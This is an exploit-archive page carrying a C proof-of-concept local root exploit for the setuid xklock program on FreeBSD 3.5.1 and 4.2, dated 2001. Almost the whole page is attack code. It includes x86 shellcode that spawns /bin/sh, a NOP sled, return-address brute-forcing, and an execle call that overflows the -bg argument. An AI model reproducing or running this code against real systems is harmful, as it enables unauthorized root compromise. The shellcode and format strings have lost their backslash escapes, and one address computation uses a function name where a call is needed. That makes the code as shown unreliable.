[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FreeBSD 3.5.1/4.2 ports package xklock local root exploit
# Published : 2001-03-03
# Author : dethy
# Previous Title : Progress Database Server 8.3b (prodb) Local Root Exploit
# Next Title : Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit
/*
* xklock - FreeBSD 3.5.1 & 4.2 ports package local root exploit
*
* The X key lock program contain several exploitable buffer overflows
* in command line arguments aswell as the 'JNAME' environment variable.
* xklock is installed setuid root by default.
* This POC exploit (ab)uses the -bg arg, brute force offset if required.
*
* Usage: ./exklock <offset>
*
* dethy@synnergy.net // www.synnergy.net
* 20 Feb 2001.
*
*/
#include <stdio.h>
#include <stdlib.h>
#define EGGSIZE 1024
#define RETSIZE 264
#define NOP 0x90
#define OFFSET 0
char shellcode[]= // execve() freebsd x86
"xebx37x5ex31xc0x88x46xfax89x46xf5x89x36x89x76"
"x04x89x76x08x83x06x10x83x46x04x18x83x46x08x1b"
"x89x46x0cx88x46x17x88x46x1ax88x46x1dx50x56xff"
"x36xb0x3bx50x90x9ax01x01x01x01x07x07xe8xc4xff"
"xffxffx02x02x02x02x02x02x02x02x02x02x02x02x02"
"x02x02x02/bin/sh.-c.sh";
u_long get_sp(void) { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[]) {
char egg[EGGSIZE], ret[RETSIZE];
int i, eggsize = EGGSIZE, retsize = RETSIZE, nop = NOP, offset=OFFSET;
long *address;
if(argc > 1){ offset = atoi(argv[1]); }
(char *)address = get_sp - offset;
fprintf(stderr, "Using addr: 0x%xn", address);
memset(egg, nop, eggsize);
memcpy(egg+(eggsize - strlen(shellcode) - 1), shellcode, strlen(shellcode));
for(i=0; i < retsize; i+=4) *(int *)&ret[i]=address;
if(execle("/usr/local/bin/xklock", egg, "-bg", ret, NULL, NULL)) {
fprintf(stderr,"Unable to execute /usr/local/bin/xklockn");
exit(1);
}
}
// www.Syue.com [2001-03-03]